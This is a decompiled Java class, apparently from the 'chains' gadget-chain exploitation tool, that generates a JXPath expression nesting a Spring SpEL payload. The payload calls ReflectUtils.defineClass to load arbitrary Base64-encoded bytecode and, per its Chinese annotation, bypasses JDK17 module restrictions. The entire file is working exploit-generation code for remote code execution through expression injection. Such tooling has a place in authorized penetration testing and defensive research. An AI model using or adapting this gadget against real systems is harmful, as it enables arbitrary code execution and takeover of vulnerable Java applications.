package com.ar3h.chains.gadget.impl.common.expression;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.lang.RandomStringUtils;

@GadgetAnnotation(name = "jxpath表达式嵌套spel加载字节码", description = "内部嵌套spel引擎实现加载任意字节码,(jdk17可用,利用org.springframework.expression.spel包下的类去绕过moudule)", dependencies = {"jxpath_Expr"}, authors = {Authors.Unam4})
@GadgetTags(tags = {Tag.JXPath_Expr, Tag.Expression}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/expression/JxpathConvert2.class */
public class JxpathConvert2 implements Gadget {
    private static String jxpathTemplate2 = "getValue(parseExpression(org.springframework.expression.spel.standard.SpelExpressionParser.new(),\"T(org.springframework.cglib.core.ReflectUtils).defineClass('%s',T(java.util.Base64).getDecoder().decode('%s'),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser')).newInstance()\"))";

    private String getObject(byte[] bArr, String str) {
        return String.format(jxpathTemplate2, str, Base64.encodeBase64String(bArr));
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        String str = "org.springframework.expression.a" + RandomStringUtils.randomAlphanumeric(16);
        gadgetContext.getEngine().setGadgetParam("className", str);
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext), str);
    }
}
